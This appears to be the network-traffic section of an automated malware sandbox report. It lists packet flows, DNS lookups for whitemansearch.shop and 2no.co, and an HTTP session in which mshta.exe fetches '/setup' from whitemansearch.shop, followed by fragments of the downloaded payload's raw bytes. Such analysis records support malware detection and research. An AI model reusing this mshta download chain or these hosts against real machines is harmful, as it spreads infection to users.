                                                                                                                                                            Feb 20, 2024 23:46:09.508698940 CET44349730142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:09.519398928 CET49728443192.168.2.5142.250.81.228
                                                                                                                                                            Feb 20, 2024 23:46:09.519431114 CET44349728142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:09.552242041 CET44349728142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:09.552352905 CET44349728142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:09.552426100 CET49728443192.168.2.5142.250.81.228
                                                                                                                                                            Feb 20, 2024 23:46:09.701870918 CET44349730142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:09.702025890 CET44349730142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:09.702090025 CET49730443192.168.2.5142.250.81.228
                                                                                                                                                            Feb 20, 2024 23:46:10.321011066 CET49728443192.168.2.5142.250.81.228
                                                                                                                                                            Feb 20, 2024 23:46:10.321047068 CET44349728142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:10.346903086 CET49730443192.168.2.5142.250.81.228
                                                                                                                                                            Feb 20, 2024 23:46:10.346946955 CET44349730142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:10.486653090 CET49731443192.168.2.5142.250.81.228
                                                                                                                                                            Feb 20, 2024 23:46:10.486707926 CET44349731142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:10.486785889 CET49731443192.168.2.5142.250.81.228
                                                                                                                                                            Feb 20, 2024 23:46:10.487220049 CET49731443192.168.2.5142.250.81.228
                                                                                                                                                            Feb 20, 2024 23:46:10.487230062 CET44349731142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:10.681159973 CET44349731142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:10.778604031 CET49731443192.168.2.5142.250.81.228
                                                                                                                                                            Feb 20, 2024 23:46:12.287168980 CET49731443192.168.2.5142.250.81.228
                                                                                                                                                            Feb 20, 2024 23:46:12.287192106 CET44349731142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:12.287787914 CET44349731142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:12.289479971 CET49731443192.168.2.5142.250.81.228
                                                                                                                                                            Feb 20, 2024 23:46:12.289551973 CET44349731142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:12.290776968 CET49731443192.168.2.5142.250.81.228
                                                                                                                                                            Feb 20, 2024 23:46:12.333905935 CET44349731142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:12.473371029 CET44349731142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:12.473444939 CET44349731142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:12.473507881 CET49731443192.168.2.5142.250.81.228
                                                                                                                                                            Feb 20, 2024 23:46:12.473520994 CET44349731142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:12.473644018 CET44349731142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:12.473709106 CET49731443192.168.2.5142.250.81.228
                                                                                                                                                            Feb 20, 2024 23:46:12.473715067 CET44349731142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:12.476006985 CET44349731142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:12.476144075 CET49731443192.168.2.5142.250.81.228
                                                                                                                                                            Feb 20, 2024 23:46:12.482201099 CET49732443192.168.2.5142.250.81.228
                                                                                                                                                            Feb 20, 2024 23:46:12.482230902 CET44349732142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:12.482296944 CET49732443192.168.2.5142.250.81.228
                                                                                                                                                            Feb 20, 2024 23:46:12.482481956 CET49732443192.168.2.5142.250.81.228
                                                                                                                                                            Feb 20, 2024 23:46:12.482497931 CET44349732142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:12.511061907 CET49731443192.168.2.5142.250.81.228
                                                                                                                                                            Feb 20, 2024 23:46:12.511084080 CET44349731142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:12.671638966 CET44349732142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:12.671890020 CET49732443192.168.2.5142.250.81.228
                                                                                                                                                            Feb 20, 2024 23:46:12.671902895 CET44349732142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:12.672249079 CET44349732142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:12.672532082 CET49732443192.168.2.5142.250.81.228
                                                                                                                                                            Feb 20, 2024 23:46:12.672593117 CET44349732142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:12.672729969 CET49732443192.168.2.5142.250.81.228
                                                                                                                                                            Feb 20, 2024 23:46:12.713916063 CET44349732142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:12.871737003 CET44349732142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:12.871783018 CET44349732142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:12.871814013 CET44349732142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:12.871828079 CET49732443192.168.2.5142.250.81.228
                                                                                                                                                            Feb 20, 2024 23:46:12.871843100 CET44349732142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:12.871871948 CET44349732142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:12.871877909 CET49732443192.168.2.5142.250.81.228
                                                                                                                                                            Feb 20, 2024 23:46:12.871886015 CET44349732142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:12.871923923 CET49732443192.168.2.5142.250.81.228
                                                                                                                                                            Feb 20, 2024 23:46:12.871927977 CET44349732142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:12.879693985 CET44349732142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:12.879776001 CET49732443192.168.2.5142.250.81.228
                                                                                                                                                            Feb 20, 2024 23:46:12.880867958 CET49732443192.168.2.5142.250.81.228
                                                                                                                                                            Feb 20, 2024 23:46:12.880888939 CET44349732142.250.81.228192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:13.628387928 CET49733443192.168.2.540.68.123.157
                                                                                                                                                            Feb 20, 2024 23:46:13.628429890 CET4434973340.68.123.157192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:13.628901958 CET49733443192.168.2.540.68.123.157
                                                                                                                                                            Feb 20, 2024 23:46:13.631287098 CET49733443192.168.2.540.68.123.157
                                                                                                                                                            Feb 20, 2024 23:46:13.631306887 CET4434973340.68.123.157192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:13.740055084 CET49735443192.168.2.5142.250.80.36
                                                                                                                                                            Feb 20, 2024 23:46:13.740092039 CET44349735142.250.80.36192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:13.740375996 CET49735443192.168.2.5142.250.80.36
                                                                                                                                                            Feb 20, 2024 23:46:13.740943909 CET49735443192.168.2.5142.250.80.36
                                                                                                                                                            Feb 20, 2024 23:46:13.740958929 CET44349735142.250.80.36192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:13.943645000 CET44349735142.250.80.36192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:13.944057941 CET49735443192.168.2.5142.250.80.36
                                                                                                                                                            Feb 20, 2024 23:46:13.944082022 CET44349735142.250.80.36192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:13.945111990 CET44349735142.250.80.36192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:13.945256948 CET49735443192.168.2.5142.250.80.36
                                                                                                                                                            Feb 20, 2024 23:46:13.948039055 CET49735443192.168.2.5142.250.80.36
                                                                                                                                                            Feb 20, 2024 23:46:13.948122978 CET44349735142.250.80.36192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:13.948225021 CET49735443192.168.2.5142.250.80.36
                                                                                                                                                            Feb 20, 2024 23:46:13.960869074 CET49703443192.168.2.523.1.237.91
                                                                                                                                                            Feb 20, 2024 23:46:13.993904114 CET44349735142.250.80.36192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:14.113400936 CET4434970323.1.237.91192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:14.124397993 CET44349735142.250.80.36192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:14.124434948 CET44349735142.250.80.36192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:14.124460936 CET44349735142.250.80.36192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:14.124483109 CET44349735142.250.80.36192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:14.124492884 CET49735443192.168.2.5142.250.80.36
                                                                                                                                                            Feb 20, 2024 23:46:14.124505043 CET44349735142.250.80.36192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:14.124532938 CET49735443192.168.2.5142.250.80.36
                                                                                                                                                            Feb 20, 2024 23:46:14.124639034 CET49735443192.168.2.5142.250.80.36
                                                                                                                                                            Feb 20, 2024 23:46:14.126868963 CET44349735142.250.80.36192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:14.126913071 CET44349735142.250.80.36192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:14.127365112 CET49735443192.168.2.5142.250.80.36
                                                                                                                                                            Feb 20, 2024 23:46:14.131892920 CET4434973340.68.123.157192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:14.132123947 CET49733443192.168.2.540.68.123.157
                                                                                                                                                            Feb 20, 2024 23:46:14.136962891 CET49733443192.168.2.540.68.123.157
                                                                                                                                                            Feb 20, 2024 23:46:14.136967897 CET4434973340.68.123.157192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:14.137281895 CET4434973340.68.123.157192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:14.138820887 CET49735443192.168.2.5142.250.80.36
                                                                                                                                                            Feb 20, 2024 23:46:14.138834000 CET44349735142.250.80.36192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:14.138855934 CET49735443192.168.2.5142.250.80.36
                                                                                                                                                            Feb 20, 2024 23:46:14.138925076 CET49735443192.168.2.5142.250.80.36
                                                                                                                                                            Feb 20, 2024 23:46:14.261822939 CET49733443192.168.2.540.68.123.157
                                                                                                                                                            Feb 20, 2024 23:46:14.664434910 CET49733443192.168.2.540.68.123.157
                                                                                                                                                            Feb 20, 2024 23:46:14.709908962 CET4434973340.68.123.157192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:14.989362955 CET4434973340.68.123.157192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:14.989389896 CET4434973340.68.123.157192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:14.989396095 CET4434973340.68.123.157192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:14.989432096 CET4434973340.68.123.157192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:14.989444971 CET4434973340.68.123.157192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:14.989451885 CET4434973340.68.123.157192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:14.989470959 CET49733443192.168.2.540.68.123.157
                                                                                                                                                            Feb 20, 2024 23:46:14.989484072 CET4434973340.68.123.157192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:14.989546061 CET49733443192.168.2.540.68.123.157
                                                                                                                                                            Feb 20, 2024 23:46:14.989546061 CET49733443192.168.2.540.68.123.157
                                                                                                                                                            Feb 20, 2024 23:46:14.989624977 CET4434973340.68.123.157192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:14.989631891 CET4434973340.68.123.157192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:14.989840031 CET49733443192.168.2.540.68.123.157
                                                                                                                                                            Feb 20, 2024 23:46:14.989850044 CET4434973340.68.123.157192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:14.990245104 CET49733443192.168.2.540.68.123.157
                                                                                                                                                            Feb 20, 2024 23:46:15.018124104 CET49733443192.168.2.540.68.123.157
                                                                                                                                                            Feb 20, 2024 23:46:15.018148899 CET4434973340.68.123.157192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:19.654566050 CET44349710104.21.79.229192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:19.654642105 CET44349710104.21.79.229192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:19.654936075 CET49710443192.168.2.5104.21.79.229
                                                                                                                                                            Feb 20, 2024 23:46:20.951469898 CET49710443192.168.2.5104.21.79.229
                                                                                                                                                            Feb 20, 2024 23:46:20.951500893 CET44349710104.21.79.229192.168.2.5
                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Feb 20, 2024 23:45:57.217767000 CET5778153192.168.2.51.1.1.1
                                                                                                                                                            Feb 20, 2024 23:45:57.834341049 CET53577811.1.1.1192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:03.993969917 CET5971153192.168.2.51.1.1.1
                                                                                                                                                            Feb 20, 2024 23:46:03.995978117 CET6235753192.168.2.51.1.1.1
                                                                                                                                                            Feb 20, 2024 23:46:04.085388899 CET53553811.1.1.1192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:04.089607954 CET53597111.1.1.1192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:04.091403961 CET53623571.1.1.1192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:04.218741894 CET5969153192.168.2.51.1.1.1
                                                                                                                                                            Feb 20, 2024 23:46:04.219001055 CET5229953192.168.2.51.1.1.1
                                                                                                                                                            Feb 20, 2024 23:46:04.219757080 CET5515453192.168.2.51.1.1.1
                                                                                                                                                            Feb 20, 2024 23:46:04.220041037 CET6534453192.168.2.51.1.1.1
                                                                                                                                                            Feb 20, 2024 23:46:04.306279898 CET53596911.1.1.1192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:04.306418896 CET53522991.1.1.1192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:04.307626009 CET53551541.1.1.1192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:04.308068991 CET53653441.1.1.1192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:05.170689106 CET53553201.1.1.1192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:05.290501118 CET5894853192.168.2.51.1.1.1
                                                                                                                                                            Feb 20, 2024 23:46:05.290750980 CET5909153192.168.2.51.1.1.1
                                                                                                                                                            Feb 20, 2024 23:46:05.381238937 CET53589481.1.1.1192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:05.381263018 CET53590911.1.1.1192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:07.078342915 CET53602681.1.1.1192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:08.150247097 CET53542201.1.1.1192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:09.185672998 CET53622781.1.1.1192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:13.644565105 CET5242853192.168.2.51.1.1.1
                                                                                                                                                            Feb 20, 2024 23:46:13.645235062 CET5591953192.168.2.51.1.1.1
                                                                                                                                                            Feb 20, 2024 23:46:13.731121063 CET53605341.1.1.1192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:13.732913017 CET53559191.1.1.1192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:13.733159065 CET53524281.1.1.1192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:22.351788044 CET53635981.1.1.1192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:41.120820999 CET53562431.1.1.1192.168.2.5
                                                                                                                                                            Feb 20, 2024 23:46:45.119148970 CET64239274192.168.2.5192.168.2.1
                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                            Feb 20, 2024 23:45:57.217767000 CET192.168.2.51.1.1.10xbac7Standard query (0)whitemansearch.shopA (IP address)IN (0x0001)false
                                                                                                                                                            Feb 20, 2024 23:46:03.993969917 CET192.168.2.51.1.1.10x2799Standard query (0)2no.coA (IP address)IN (0x0001)false
                                                                                                                                                            Feb 20, 2024 23:46:03.995978117 CET192.168.2.51.1.1.10x6004Standard query (0)2no.co65IN (0x0001)false
                                                                                                                                                            Feb 20, 2024 23:46:04.218741894 CET192.168.2.51.1.1.10x9a68Standard query (0)clients2.google.comA (IP address)IN (0x0001)false
                                                                                                                                                            Feb 20, 2024 23:46:04.219001055 CET192.168.2.51.1.1.10xb330Standard query (0)clients2.google.com65IN (0x0001)false
                                                                                                                                                            Feb 20, 2024 23:46:04.219757080 CET192.168.2.51.1.1.10x33fdStandard query (0)accounts.google.comA (IP address)IN (0x0001)false
                                                                                                                                                            Feb 20, 2024 23:46:04.220041037 CET192.168.2.51.1.1.10xcd89Standard query (0)accounts.google.com65IN (0x0001)false
                                                                                                                                                            Feb 20, 2024 23:46:05.290501118 CET192.168.2.51.1.1.10xe2eeStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                            Feb 20, 2024 23:46:05.290750980 CET192.168.2.51.1.1.10xb4fcStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                            Feb 20, 2024 23:46:13.644565105 CET192.168.2.51.1.1.10x57c1Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                            Feb 20, 2024 23:46:13.645235062 CET192.168.2.51.1.1.10xec62Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                            Feb 20, 2024 23:45:57.834341049 CET1.1.1.1192.168.2.50xbac7No error (0)whitemansearch.shop5.101.153.86A (IP address)IN (0x0001)false
                                                                                                                                                            Feb 20, 2024 23:46:04.089607954 CET1.1.1.1192.168.2.50x2799No error (0)2no.co104.21.79.229A (IP address)IN (0x0001)false
                                                                                                                                                            Feb 20, 2024 23:46:04.089607954 CET1.1.1.1192.168.2.50x2799No error (0)2no.co172.67.149.76A (IP address)IN (0x0001)false
                                                                                                                                                            Feb 20, 2024 23:46:04.091403961 CET1.1.1.1192.168.2.50x6004No error (0)2no.co65IN (0x0001)false
                                                                                                                                                            Feb 20, 2024 23:46:04.306279898 CET1.1.1.1192.168.2.50x9a68No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Feb 20, 2024 23:46:04.306279898 CET1.1.1.1192.168.2.50x9a68No error (0)clients.l.google.com142.251.40.238A (IP address)IN (0x0001)false
                                                                                                                                                            Feb 20, 2024 23:46:04.306418896 CET1.1.1.1192.168.2.50xb330No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Feb 20, 2024 23:46:04.307626009 CET1.1.1.1192.168.2.50x33fdNo error (0)accounts.google.com142.250.31.84A (IP address)IN (0x0001)false
                                                                                                                                                            Feb 20, 2024 23:46:05.381238937 CET1.1.1.1192.168.2.50xe2eeNo error (0)www.google.com142.250.81.228A (IP address)IN (0x0001)false
                                                                                                                                                            Feb 20, 2024 23:46:05.381263018 CET1.1.1.1192.168.2.50xb4fcNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                            Feb 20, 2024 23:46:13.732913017 CET1.1.1.1192.168.2.50xec62No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                            Feb 20, 2024 23:46:13.733159065 CET1.1.1.1192.168.2.50x57c1No error (0)www.google.com142.250.80.36A (IP address)IN (0x0001)false
                                                                                                                                                            • 2no.co
                                                                                                                                                            • accounts.google.com
                                                                                                                                                            • clients2.google.com
                                                                                                                                                            • www.google.com
                                                                                                                                                            • https:
                                                                                                                                                            • slscr.update.microsoft.com
                                                                                                                                                            • update.googleapis.com
                                                                                                                                                            • clients1.google.com
                                                                                                                                                            • whitemansearch.shop
                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            0192.168.2.5497055.101.153.86807216C:\Windows\System32\mshta.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Feb 20, 2024 23:45:58.066555977 CET328OUTGET /setup HTTP/1.1
                                                                                                                                                            Accept: */*
                                                                                                                                                            Accept-Language: en-CH
                                                                                                                                                            UA-CPU: AMD64
                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                            Host: whitemansearch.shop
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Feb 20, 2024 23:45:58.322794914 CET1286INHTTP/1.1 200 OK
                                                                                                                                                            Server: nginx-reuseport/1.21.1
                                                                                                                                                            Date: Tue, 20 Feb 2024 22:45:58 GMT
                                                                                                                                                            Content-Length: 73556
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Keep-Alive: timeout=30
                                                                                                                                                            Last-Modified: Tue, 20 Feb 2024 17:49:05 GMT
                                                                                                                                                            ETag: "11f54-611d3d389af7b"
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Data Raw: b2 70 2b da 3d 4c 4c d3 60 f1 69 5a 48 e2 cf 14 f0 67 98 bf 80 54 b5 9e 1a 24 45 04 4c 75 5e aa f5 20 ce c4 d1 f2 ab 78 2e 7a 20 3c f4 b4 8d f2 ca a6 01 c6 38 c3 03 5e ba 8d bf 18 06 47 86 ea 93 be 65 27 14 0b 42 fd bc 20 91 06 33 79 aa 66 96 52 39 a6 73 97 72 31 1c 70 09 44 32 92 71 e6 f3 35 a8 35 4f 66 de bf 63 04 0a 18 32 fd 2a 41 e3 59 82 b4 0e e0 77 fb 4c 33 0a a3 01 fe ca 29 ae aa 13 fe d0 74 17 30 73 7a 42 6f 8d 59 ff 1f 46 c8 61 d9 10 bd d8 13 be ac e8 1b 5c 3a bd 65 39 e1 69 87 ea 2c 70 6e 42 52 40 93 9d 07 6e f3 34 ea 5d 39 9d f1 18 f0 d2 00 3f 23 8c fb d3 38 bc dd 36 ab ef 77 35 19 57 f2 97 be 7d 44 75 b6 3e f5 e6 71 dd 84 c8 47 c8 78 b4 ea ec 4c e2 46 7e 07 d7 bf d1 c2 03 bd b5 44 e1 aa 59 5a 73 8e 8a 89 e5 96 15 62 5b 38 15 ee e3 76 c2 4b 2d 0b 10 51 40 75 6d b6 e4 7b f1 29 bb 99 a2 1d ee 6e 05 26 5f 62 67 4b 30 1b ab 9e aa e3 df 8c fa 6a 16 d6 99 08 1a fe 20 d4 a4 6a a5 eb a6 c2 95 f7 00 75 71 9b eb ca a3 c5 20 24 ca ce 0b 01 9b 65 2e 51 82 cc 84 e5 54 07 06 8b bd fd a6 45 75 e8 09 b2 e3 6a 1a 5e 7f 4b 32 d4 e7 f5 33 51 c8 a3 ce 3f bc 55 40 c9 72 1a 21 6a 95 5f 0c a6 1e db af e1 c5 58 1d 31 4a cf d2 36 99 b0 fd 5e d3 b4 c3 1a 2e 66 88 1f a8 40 3f c9 49 b0 c9 1f 3f 8b b5 0c 46 52 8c 6f 86 9c f5 ed 82 09 2f c2 1c c2 97 e0 9b f2 78 b8 53 8f 39 85 18 54 e8 9a 06 b2 f7 0d fa f1 18 80 28 53 93 92 71 9b 9d 9e 10 7d ad 86 18 e9 83 4c 13 fc b9 b6 19 07 56 32 b4 5b e7 d0 12 21 c7 2a aa 16 b7 48 5e e6 47 b8 f2 9b 74 9b a7 61 81 1c 2e aa f9 fe 38 61 67 21 fc 61 dd 15 b4 cc 8b ee b5 82 dc 01 31 3b ee 2d b5 00 c4 7e 92 bb 8a 52 d9 ca a1 68 27 c9 f2 48 af 96 4b fc 08 31 04 25 0f 85 e6 24 84 7f ea f2 bc cc 48 37 9d e9 8e 41 d6 8a 3c e9 2a 22 c7 eb 8f 94 52 9b f0 f1 25 84 fc 9e 6e 0d d5 65 cd 5a df ae ac 5b 81 ba ab c5 07 09 25 7d f5 1a fa ec be fa 95 f0 2c 4f 02 cb a6 c3 3a fe 7b 81 6c 71 bd e1 09 7b 76 6b 6a d5 e8 8d 93 e6 cb a8 8f e2 a4 81 4f db d0 dd 2d 8f ac e1 b4 bd 7f ad 4a 86 9d b4 c0 13 10 7e 76 52 90 bf 07 9f bc 1b ff fe 34 58 59 f9 31 90 a0 df b3 79 cf 95 b6 ac 55 3b 43 0c 48 16 e7 7c d1 25 0b fc 4a 10 d5 8e d3 90 e1 b6 89 27 53 50 55 0c 14 e0 5f 96 af e0 9c e3 6a cc 5b af d3 e9 16 b8 87 34 ee 35 45 8f 0a 25 a6 3e b4 00 22 2e e7 f2 b7 3b 01 07 1c 3a 75 2a 60 67 a6 08 32 24 bd f7 9f d1 9f 1e 62 20 c7 85 d5 3a f0 70 2c 9c c1 3c e4 69 f8 97 e7 0f 9b 4c be c3 d4 de e9 01 f2 82 81 bc 60 50 8e c8 90 97 74 7c 31 e2 4a 04 fe c4 a5 69 23 c9 2b 25 0f 90 36 53 60 9f 4b e8 9c d3 47 6e ef 70 3b 71 ae 1b d9 61 22 6b dd b9 02 ba c4 10 39 7f dd 29 56 5b ac d0 1a 3b 68 f0 4b 8c e0 5d 9a db 14 8e 88 34 bb 08 ef ca 03 a4 b2 7d 50 a5 da 3a ae 1c f5 1e 17 94 c3 6a 56 73 b3 e8 15 96 8b 80 1e 26 a5 36 87 04 c4 d5 39 8c 58 07 1e 9d ea c3 15 10 dd c3 67 7b c3 80 ca 1e dd 48 54 07 b5 6c 18 32 5e 29 00 a4 b3 a9 57 20 e5 8b 3c bc 4c b9 88 f0 d2 04 b8 c7 18 a3 63 24 6b 69 27 7c 80 31 d7 eb ef ec 3e c1 c2 71 5d 33 6c 47 95 37 44 0e d2 23 bf 64 34 b0 b3 50 19 ba c6 db 38 4a 82 da 9f b3 b4 50 cc 5f 7a c7 2d 61 a7 85 5b d0 0d 2b e0 5d 97 03 bc 1b fd 26 37 9e d2 84 fa e6 38 12 b1 91 a8 e2 83 f3 41 72 a9 f8 37 d2 09 2e f5 49 ad 9b fb da b3 7f 1d 83 b6 8e 18 2e
                                                                                                                                                            Data Ascii: p+=LL`iZHgT$ELu^ x.z <8^Ge'B 3yfR9sr1pD2q55Ofc2*AYwL3)t0szBoYFa\:e9i,pnBR@n4]9?#86w5W}Du>qGxLF~DYZsb[8vK-Q@um{)n&_bgK0j juq $e.QTEuj^K23Q?U@r!j_X1J6^.f@?I?FRo/xS9T(Sq}LV2[!*H^Gta.8ag!a1;-~Rh'HK1%$H7A<*"R%neZ[%},O:{lq{vkjO-J~vR4XY1yU;CH|%J'SPU_j[45E%>".;:u*`g2$b :p,<iL`Pt|1Ji#+%6S`KGnp;qa"k9)V[;hK]4}P:jVs&69Xg{HTl2^)W <Lc$ki'|1>q]3lG7D#d4P8JP_z-a[+]&78Ar7.I.
                                                                                                                                                            Feb 20, 2024 23:45:58.322833061 CET1286INData Raw: 8c f6 cc 46 28 94 d3 c9 27 2b a8 ec 1c 24 5a c4 e4 2a 1d 09 a9 89 d6 5e eb 5d 5f 32 73 25 2b f4 db 13 e5 b2 2b f0 a9 74 5a 2b 21 81 f3 0f be 8e 24 59 9e 8b 70 0f 85 03 20 6d 5b ca 34 a1 56 02 ff b3 11 08 3e a8 99 f3 81 a8 ae 7d 68 54 6b db 9f d1
                                                                                                                                                            Data Ascii: F('+$Z*^]_2s%++tZ+!$Yp m[4V>}hTk@@O|a+c;{_.Ez\_hI+ZiG%#<eKg^l_QCrO J$+u.^'qo"ZHwOJ~Tl<WT
                                                                                                                                                            Feb 20, 2024 23:45:58.322855949 CET1286INData Raw: 66 cc e7 eb b1 1b e9 c7 f3 c2 db 8e 9c bc a5 ac a8 b2 9d f9 8a 9a 49 11 19 2c 42 d9 3f 35 64 83 5c 17 ef 8d c9 24 1c 0e d9 50 89 f3 2d d0 32 65 c6 ce 9e 55 90 91 68 cc 82 d5 d1 84 d8 10 88 be 5e 58 32 85 cd 18 e2 84 95 8e 1f 3a 10 56 e3 49 f9 dd
                                                                                                                                                            Data Ascii: fI,B?5d\$P-2eUh^X2:VIp"R6r.,(Neh1XUrELEc{OXf;Fo4vk>uWC0fzwvXF;q1F$~pGc\p.Sv&X3
                                                                                                                                                            Feb 20, 2024 23:45:58.322876930 CET1286INData Raw: 0a 80 b5 e4 7d 0e 63 10 58 9e f8 34 64 6c 15 84 6d c4 05 4f 24 53 3b 3f 57 38 df 12 6a 96 15 80 d9 8c d7 d3 e9 f3 8a a0 6c 27 3a b7 c8 a7 43 0b 8e f6 95 34 6c 23 f7 b7 44 76 8d 45 2f 50 a6 c1 88 77 5b d8 94 41 9a 79 39 64 e2 fd 18 84 76 af f4 d3
                                                                                                                                                            Data Ascii: }cX4dlmO$S;?W8jl':C4l#DvE/Pw[Ay9dvsseEqy.QLjwL\@P[3dCt&}U%b[8usPM'5y|j{X0v/8bXc.0v{7Lc;b5r~
